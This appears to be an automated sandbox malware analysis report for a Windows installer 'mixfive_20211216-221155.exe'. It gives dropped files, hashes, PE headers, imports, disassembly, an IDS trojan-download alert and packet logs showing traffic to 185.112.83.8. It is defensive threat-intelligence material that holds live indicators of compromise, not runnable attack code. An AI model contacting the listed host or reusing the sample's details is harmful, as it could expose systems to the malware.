                                                                                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b
                                                                                                                                            C:\Users\user\AppData\Local\Temp\a.txt
                                                                                                                                            Process:C:\Users\user\Desktop\mixfive_20211216-221155.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):23
                                                                                                                                            Entropy (8bit):2.2068570640942187
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:jNDBfN:jNVfN
                                                                                                                                            MD5:6C3AA179406696C66ACF8DC984ABC7DF
                                                                                                                                            SHA1:7F66AB35CA41A3449382F9DA68864D64EC182F28
                                                                                                                                            SHA-256:798DF5B3298985AE022F8C5A6714F7891EAA49B2E4B24E3A8B2329C04DD11C71
                                                                                                                                            SHA-512:7551B1FBE1CAEF52FD0AFC8601DCD0D6F013198FCC7CBF57F42EB090577B34B91E6F4ADCE1A76BC7FFD95559A3FDD529FE6DE90B8335EF8E901CBB606DDAE836
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview: ghdfhjfghfgjfdghfghfgdh
                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiE423.tmp\System.dll
                                                                                                                                            Process:C:\Users\user\Desktop\mixfive_20211216-221155.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12288
                                                                                                                                            Entropy (8bit):5.814115788739565
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                                                                                            MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                                                                                            SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                                                                                            SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                                                                                                            SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Reputation:low
                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            C:\Users\user\AppData\Local\Temp\superprecise.dat
                                                                                                                                            Process:C:\Users\user\Desktop\mixfive_20211216-221155.exe
                                                                                                                                            File Type:DOS executable (COM)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):45816
                                                                                                                                            Entropy (8bit):7.731391764710501
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:zvYUFVu+AKtzruz6ProsiAXEq7kjANo6iVW/lccurKOaYgoBhbz77k+yOCf:zgUFWCoaosiAXVkj448acQRn7k+FCf
                                                                                                                                            MD5:A1802D9DCD94AF7E3F2CE4577BA6E667
                                                                                                                                            SHA1:1B836F996B3FB4E812516EBDEA714FACCB45ADF3
                                                                                                                                            SHA-256:DCC5CD1E4CC8AFE4A04F8931DA635821B60A07869DAC0327D043B26C96C39680
                                                                                                                                            SHA-512:0177CD7562C6121D31F2EBBCD29EA6C0927C49A03F06101C94AD92FC999064369DBA629418EAF774A82333F1C10DBB3D23F3EA5C32C03EF43C8982C8808A3627
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview: .__.?.u.....u.....u..........a.....H....s.r..tb..........R..~...Q..a...Z1..4.z.......9.u.W..........z..z.....I.....J[.0P>.....T.-.......4C.Bj.@.*....*.7@.g..N.&v.~..b.jlE1......u)W..M....Az|.~..cd.c.<..;x.W..]g..j..3.K...Z...a......{|.A..h....F9......E.E...k..r.H8.#.Mc..!N.../..n.WC.\.u*l.o^.-6..{.%9;.I..&Q......os.".U5k.tQ5../6.uP.T..?.I.........o..NsWu\..".o.Y-EU.We..T...i.3.Nk..s..<...."...mc.3..{...z...m....lw..L.{......R.I.|.*..Iqr.z...B.$.>qp....o..Wn.rCm......&..]...... .IcfG..b.....E....C,".>pF.pE.}q...qh.z..>.>.j....S....$y.!.%.C'....-{.......6.a?. .fN_...C....g?. .fN....,..!.z}.&z...C7BX........".l.l*.g....z}jk...6.y..z...Ac.z..k..7Iz...B.l.^..T.5.7.....a.b............+...$.-B6g..&R\t.......8P.>3...2...T.6..0....F......{........"....Up.W.T5 .|..u............."...wt...7"..}...0.(....g....kb..m.oXoN....1g.)...>.*.^d.ROu.......G..%V.aN."....K.........w......H.}&v{..WT ......2.*...z......B..X%...."...>../6....>k.]CA*.q.*....l.... .\.;.x..uB.'.

                                                                                                                                            Static File Info

                                                                                                                                            General

                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                            Entropy (8bit):7.516196878438645
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                            File name:mixfive_20211216-221155.exe
                                                                                                                                            File size:94872
                                                                                                                                            MD5:66e3c71bcd364eb5cf19cb820683ef0c
                                                                                                                                            SHA1:a51f002e800d652c14b2de10a63bbb80d276a33b
                                                                                                                                            SHA256:ee23fa71bea1f05017e21b38e7592db6334a0fc4e9e44bb48452b40a4ddf0677
                                                                                                                                            SHA512:aaebefe644c3f4574f787a45581e95ec34e0c31183ef10c0d2246849b4f87e5e9c593dbb29083730c0f9e6e41f58ed4f1b9e33153f2b6c7c1ed789bc1047468f
                                                                                                                                            SSDEEP:1536:C/T2X/jN2vxZz0DTHUpouMJbKxE+1COGa5Cq1IpBN+mzFGFDGBXTgpMu:CbG7N2kDTHUpouMJbKPCOHPKpjZcFiBm
                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

                                                                                                                                            File Icon

                                                                                                                                            Icon Hash:b2a88c96b2ca6a72

                                                                                                                                            Static PE Info

                                                                                                                                            General

                                                                                                                                            Entrypoint:0x40352d
                                                                                                                                            Entrypoint Section:.text
                                                                                                                                            Digitally signed:true
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                            Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:4
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:4
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:4
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6

                                                                                                                                            Authenticode Signature

                                                                                                                                            Signature Valid:false
                                                                                                                                            Signature Issuer:E=Befattet1@PROGRAMMRENS.je, CN=HOOSIERS, OU=Stridhanum, O=cacogenics, L=PREEXCLUDE, S=Kildeprogram5, C=BO
                                                                                                                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                            Error Number:-2146762487
                                                                                                                                            Not Before, Not After
                                                                                                                                            • 12/16/2021 9:40:48 PM 12/16/2022 9:40:48 PM
                                                                                                                                            Subject Chain
                                                                                                                                            • E=Befattet1@PROGRAMMRENS.je, CN=HOOSIERS, OU=Stridhanum, O=cacogenics, L=PREEXCLUDE, S=Kildeprogram5, C=BO
                                                                                                                                            Version:3
                                                                                                                                            Thumbprint MD5:C38498DE2531ABF84BECF49043690614
                                                                                                                                            Thumbprint SHA-1:2842B94EA877AFB3636B19981AAA0064D670C195
                                                                                                                                            Thumbprint SHA-256:615A16AE963F927807D331ACBC53376A766EA5DD3B6C976EB920B62F562AFD5B
                                                                                                                                            Serial:00

                                                                                                                                            Entrypoint Preview

                                                                                                                                            Instruction
                                                                                                                                            push ebp
                                                                                                                                            mov ebp, esp
                                                                                                                                            sub esp, 000003F4h
                                                                                                                                            push ebx
                                                                                                                                            push esi
                                                                                                                                            push edi
                                                                                                                                            push 00000020h
                                                                                                                                            pop edi
                                                                                                                                            xor ebx, ebx
                                                                                                                                            push 00008001h
                                                                                                                                            mov dword ptr [ebp-14h], ebx
                                                                                                                                            mov dword ptr [ebp-04h], 0040A2E0h
                                                                                                                                            mov dword ptr [ebp-10h], ebx
                                                                                                                                            call dword ptr [004080CCh]
                                                                                                                                            mov esi, dword ptr [004080D0h]
                                                                                                                                            lea eax, dword ptr [ebp-00000140h]
                                                                                                                                            push eax
                                                                                                                                            mov dword ptr [ebp-0000012Ch], ebx
                                                                                                                                            mov dword ptr [ebp-2Ch], ebx
                                                                                                                                            mov dword ptr [ebp-28h], ebx
                                                                                                                                            mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                                                                            call esi
                                                                                                                                            test eax, eax
                                                                                                                                            jne 00007FF048961DDAh
                                                                                                                                            lea eax, dword ptr [ebp-00000140h]
                                                                                                                                            mov dword ptr [ebp-00000140h], 00000114h
                                                                                                                                            push eax
                                                                                                                                            call esi
                                                                                                                                            mov ax, word ptr [ebp-0000012Ch]
                                                                                                                                            mov ecx, dword ptr [ebp-00000112h]
                                                                                                                                            sub ax, 00000053h
                                                                                                                                            add ecx, FFFFFFD0h
                                                                                                                                            neg ax
                                                                                                                                            sbb eax, eax
                                                                                                                                            mov byte ptr [ebp-26h], 00000004h
                                                                                                                                            not eax
                                                                                                                                            and eax, ecx
                                                                                                                                            mov word ptr [ebp-2Ch], ax
                                                                                                                                            cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                                                                            jnc 00007FF048961DAAh
                                                                                                                                            and word ptr [ebp-00000132h], 0000h
                                                                                                                                            mov eax, dword ptr [ebp-00000134h]
                                                                                                                                            movzx ecx, byte ptr [ebp-00000138h]
                                                                                                                                            mov dword ptr [00434FB8h], eax
                                                                                                                                            xor eax, eax
                                                                                                                                            mov ah, byte ptr [ebp-0000013Ch]
                                                                                                                                            movzx eax, ax
                                                                                                                                            or eax, ecx
                                                                                                                                            xor ecx, ecx
                                                                                                                                            mov ch, byte ptr [ebp-2Ch]
                                                                                                                                            movzx ecx, cx
                                                                                                                                            shl eax, 10h
                                                                                                                                            or eax, ecx

                                                                                                                                            Rich Headers

                                                                                                                                            Programming Language:
                                                                                                                                            • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                            Data Directories

                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x4c0000xe48.rsrc
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x15e300x1468.data
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                            Sections

                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                            .text0x10000x68970x6a00False0.666126179245data6.45839821493IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                            .rdata0x80000x14a60x1600False0.439275568182data5.02410928126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                            .data0xa0000x2b0180x600False0.521484375data4.15458210409IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                            .ndata0x360000x160000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                            .rsrc0x4c0000xe480x1000False0.38916015625data4.02680822028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                            Resources

                                                                                                                                            NameRVASizeTypeLanguageCountry
                                                                                                                                            RT_ICON0x4c2080x2e8dataEnglishUnited States
                                                                                                                                            RT_DIALOG0x4c4f00x100dataEnglishUnited States
                                                                                                                                            RT_DIALOG0x4c5f00x11cdataEnglishUnited States
                                                                                                                                            RT_DIALOG0x4c7100xc4dataEnglishUnited States
                                                                                                                                            RT_DIALOG0x4c7d80x60dataEnglishUnited States
                                                                                                                                            RT_GROUP_ICON0x4c8380x14dataEnglishUnited States
                                                                                                                                            RT_VERSION0x4c8500x2b4dataEnglishUnited States
                                                                                                                                            RT_MANIFEST0x4cb080x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                                            Imports

                                                                                                                                            DLLImport
                                                                                                                                            ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                                                                            SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                                                                            ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                                                                            COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                                                                            USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                                                                            GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                                                                            KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                                                                                                            Version Infos

                                                                                                                                            DescriptionData
                                                                                                                                            LegalCopyrightAsilum
                                                                                                                                            FileVersion1.2.3
                                                                                                                                            CompanyNameAsilum company
                                                                                                                                            LegalTrademarksAsilum is a trademark of Asilum company
                                                                                                                                            CommentsAsilum
                                                                                                                                            ProductNameAsilum Application
                                                                                                                                            FileDescriptionAsilum Application
                                                                                                                                            Translation0x0409 0x04b0

                                                                                                                                            Possible Origin

                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                            EnglishUnited States

                                                                                                                                            Network Behavior

                                                                                                                                            Snort IDS Alerts

                                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                            12/17/21-10:17:12.474954ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8
                                                                                                                                            12/17/21-10:18:00.248809TCP2018752ET TROJAN Generic .bin download from Dotted Quad4985780192.168.2.4185.112.83.8

                                                                                                                                            Network Port Distribution

                                                                                                                                            TCP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Dec 17, 2021 10:18:00.193520069 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.248158932 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.248332977 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.248809099 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.303559065 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.303594112 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.303620100 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.303664923 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.303706884 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.303746939 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.303761005 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.303788900 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.303800106 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.303807020 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.303822994 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.303829908 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.303873062 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.303888083 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.303908110 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.303916931 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.303955078 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.303973913 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.358897924 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.358947992 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.358983994 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.359018087 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.359054089 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.359102011 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.359149933 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.359201908 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.359251976 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.359260082 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.359297037 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.359302044 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.359302998 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.359352112 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.359379053 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.359400988 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.359451056 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.359455109 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.359508038 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.359530926 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.359559059 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.359596968 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.359612942 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.359663963 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.359666109 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.359714031 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.359716892 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.359766006 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.359791994 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.359818935 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.359865904 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.359910011 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.415115118 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.415174961 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.415205956 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.415237904 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.415277004 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.415316105 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.415357113 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.415407896 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.415460110 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.415518045 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.415546894 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.415572882 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.415584087 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.415590048 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.415631056 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.415648937 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.415685892 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.415718079 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.415740967 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.415756941 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.415801048 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.415802002 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.415853977 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.415895939 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.415914059 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.415960073 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.415971994 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.416007042 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.416028976 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.416052103 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.416085958 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.416102886 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.416145086 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.416152954 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.416203022 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.416244030 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.416258097 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.416307926 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.416311979 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.416354895 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.416357994 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.416397095 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.416404963 CET4985780192.168.2.4185.112.83.8
                                                                                                                                            Dec 17, 2021 10:18:00.416435003 CET8049857185.112.83.8192.168.2.4
                                                                                                                                            Dec 17, 2021 10:18:00.416455030 CET4985780192.168.2.4185.112.83.8
